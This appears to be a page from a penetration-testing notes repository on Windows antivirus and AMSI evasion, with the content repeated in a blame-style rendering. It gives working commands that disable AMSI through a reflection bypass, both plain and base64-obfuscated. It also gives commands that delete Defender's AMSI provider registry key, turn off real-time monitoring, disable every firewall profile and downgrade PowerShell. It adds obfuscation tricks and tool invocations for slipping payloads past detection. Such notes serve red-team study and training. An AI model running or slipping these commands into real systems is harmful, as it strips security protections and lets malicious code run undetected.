killchain-compendium/Post Exploitation/Windows/Antivirus Evasion.md

# Antivirus Evasion

* Existing types
    * On-Disk evasion
    * In-Memory evasion

* Detection Methods
    * Static Detection -- Hash or String/Byte Matching 
    * Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime
    * Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software

* Additional Features
    * Unpacker -- decrypting and decompress
    * PE header parser -- portable executable headers are parsed
    * Emulation -- analysis in an emulated env

## Enumeration

```sh
wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
```
```sh
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
```
* Check firewall
```sh
Get-NetFirewallProfile | Format-Table Name, Enabled
```
```sh
Get-NetFirewallRule | select DisplayName, Enabled, Description
```
* Check inbound port availability
```sh
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
```

* Check Windows Defender and its active rules
```sh
powershell -c "Get-MpPreference"
powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id
```

* Check tamper protection, and [bypass](https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1)
```sh
reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection
```

## Reset Options
```sh
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
```

## Anti Malware Secure Interface

* Powershell .NET runtime detection measure of windows. Scans code before executed.
* https://docs.microsoft.com/en-us/windows/win32/amsi/
* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions
* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream
* Integrated inside components
    * User Account Control (UAC)
    * Powershell
    * Windows Script Host (wscript, csrcipt)
    * JavaScript and VBScript
    * VBA macros
* `System.Management.Automation.dll`

* Flow
```
               |          Win32 API              |         COM API            |         AV Provider        |
Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()
```

### Return Result/Response Codes
```
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
```

### PowerShell Downgrade Attack

* Downgrade Powershell version to 2.0, where no AMSI is implemented
```sh
PowerShell -Version 2
```

* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this

### Reflection Bypass

* Varying string concatenation and camelCasing variations of the following string by Matt Graeber
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
```sh
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
or an obfuscated version
```sh
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true
```

### AMSI ScanBuffer patch

* Patching `amsi.dll`, which is loaded at Powershell startup
* AMSI ScanBuffer is delivered to `amsi.dll`

* Get handle of `amsi.dll`
* Get process address of AmsiScanBuffer
* Modify mem protection of AmsiScanBuffer
* Write opcode to AMSIScanBuffer

* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)

### Other Bypasses and Tools

* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)

* [amsifail](http://amsi.fail/) generates obfuscated snippets

### Validate

* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions
* Validate Obfuscation and check which strings trigger AMSI
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
```sh
.\\AMSITrigger.exe -u <URL> -f 1
```
or
```sh
.\\AMSITrigger.exe -i <file> -f 1
```
### Further Obfuscation

* String concatenation
```sh
$OBF = 'Ob' + 'fu' + 's' +'cation'
```
* `Concatenate - ('co'+'ffe'+'e')`
* `Reorder - ('{1}{0}'-f'ffee','co')`
* `Whitespace - ( 'co' +'fee' + 'e')`

#### Type Obfuscation

* .NET has type accelerators as aliases for types to shorten them and break the signature.
* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell)
* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)
* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1)

* Example
    * Without
```sh
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
```
    * With
```sh
[dorkstork]::copy($buf, 0, $BufferAddress, 6);
```

### Automated Obfuscation 

#### Powershell

* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide)
```sh
Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit
```
* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded.

#### Other Obfuscation

* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck)
    * Has to be build via VS. Will output a ddll, an excutable and an XML file.
    * `ThreatCheck.exe -f <file>`
* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)

## Links

* [cmnatic](https://cmnatic.co.uk/)
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
* [amsi.fail](https://amsi.fail/)
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Antivirus Evasion`

			`* Existing types`
			`* On-Disk evasion`
			`* In-Memory evasion`

			`* Detection Methods`
			`* Static Detection -- Hash or String/Byte Matching`
			`* Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime`
			`* Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software`

			`* Additional Features`
			`* Unpacker -- decrypting and decompress`
			`* PE header parser -- portable executable headers are parsed`
			`* Emulation -- analysis in an emulated env`

			`## Enumeration`

			```sh
			`wmic /namespace:\\root\securitycenter2 path antivirusproduct`
			`Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct`
			```
			```sh
			`Get-Service WinDefend`
			`Get-MpComputerStatus \| select RealTimeProtectionEnabled`
			```
			`* Check firewall`
			```sh
			`Get-NetFirewallProfile \| Format-Table Name, Enabled`
			```
			```sh
			`Get-NetFirewallRule \| select DisplayName, Enabled, Description`
			```
			`* Check inbound port availability`
			```sh
			`Test-NetConnection -ComputerName 127.0.0.1 -Port 80`
			```

			`* Check Windows Defender and its active rules`
			```sh
			`powershell -c "Get-MpPreference"`
			`powershell -c "Get-MpPreference \| Select-Object -ExpandProperty AttackSurfaceReductionRules_Id`
			```

			`* Check tamper protection, and [bypass](https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1)`
			```sh
			`reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection`
			```

			`## Reset Options`
			```sh
			`Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False`
			```

			`## Anti Malware Secure Interface`

			`* Powershell .NET runtime detection measure of windows. Scans code before executed.`
			`* https://docs.microsoft.com/en-us/windows/win32/amsi/`
			`* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions`
			`* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream`
			`* Integrated inside components`
			`* User Account Control (UAC)`
			`* Powershell`
			`* Windows Script Host (wscript, csrcipt)`
			`* JavaScript and VBScript`
			`* VBA macros`
			* `System.Management.Automation.dll`

			`* Flow`
			```
			`\| Win32 API \| COM API \| AV Provider \|`
			`Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()`
			```

			`### Return Result/Response Codes`
			```
			`AMSI_RESULT_CLEAN = 0`
			`AMSI_RESULT_NOT_DETECTED = 1`
			`AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384`
			`AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479`
			`AMSI_RESULT_DETECTED = 32768`
			```

			`### PowerShell Downgrade Attack`

			`* Downgrade Powershell version to 2.0, where no AMSI is implemented`
			```sh
			`PowerShell -Version 2`
			```

			`* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this`

			`### Reflection Bypass`

			`* Varying string concatenation and camelCasing variations of the following string by Matt Graeber`
			`* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)`
			```sh
			`[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)`
			```
			`or an obfuscated version`
			```sh
			`[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)`
			`Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse`
			`Set-MpPreference -DisableRealtimeMonitoring $true`
			```

			`### AMSI ScanBuffer patch`

			* Patching `amsi.dll`, which is loaded at Powershell startup
			* AMSI ScanBuffer is delivered to `amsi.dll`

			* Get handle of `amsi.dll`
			`* Get process address of AmsiScanBuffer`
			`* Modify mem protection of AmsiScanBuffer`
			`* Write opcode to AMSIScanBuffer`

			`* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)`
			`* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)`

			`### Other Bypasses and Tools`

			`* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)`

			`* [amsifail](http://amsi.fail/) generates obfuscated snippets`

			`### Validate`

			`* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions`
			`* Validate Obfuscation and check which strings trigger AMSI`
			`* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)`
			```sh
			`.\\AMSITrigger.exe -u <URL> -f 1`
			```
			`or`
			```sh
			`.\\AMSITrigger.exe -i <file> -f 1`
			```
			`### Further Obfuscation`

			`* String concatenation`
			```sh
			`$OBF = 'Ob' + 'fu' + 's' +'cation'`
			```
			* `Concatenate - ('co'+'ffe'+'e')`
			* `Reorder - ('{1}{0}'-f'ffee','co')`
			* `Whitespace - ( 'co' +'fee' + 'e')`

			`#### Type Obfuscation`

			`* .NET has type accelerators as aliases for types to shorten them and break the signature.`
			`* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell)`
			`* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html)`
			`* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1)`

			`* Example`
			`* Without`
			```sh
			`[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);`
			```
			`* With`
			```sh
			`[dorkstork]::copy($buf, 0, $BufferAddress, 6);`
			```

			`### Automated Obfuscation`

			`#### Powershell`

			`* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)`
			`* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide)`
			```sh
			`Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit`
			```
			`* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded.`

			`#### Other Obfuscation`

			`* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck)`
			`* Has to be build via VS. Will output a ddll, an excutable and an XML file.`
			* `ThreatCheck.exe -f <file>`
			`* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)`

			`## Links`

			`* [cmnatic](https://cmnatic.co.uk/)`
			`* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)`
			`* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)`
			`* [amsi.fail](https://amsi.fail/)`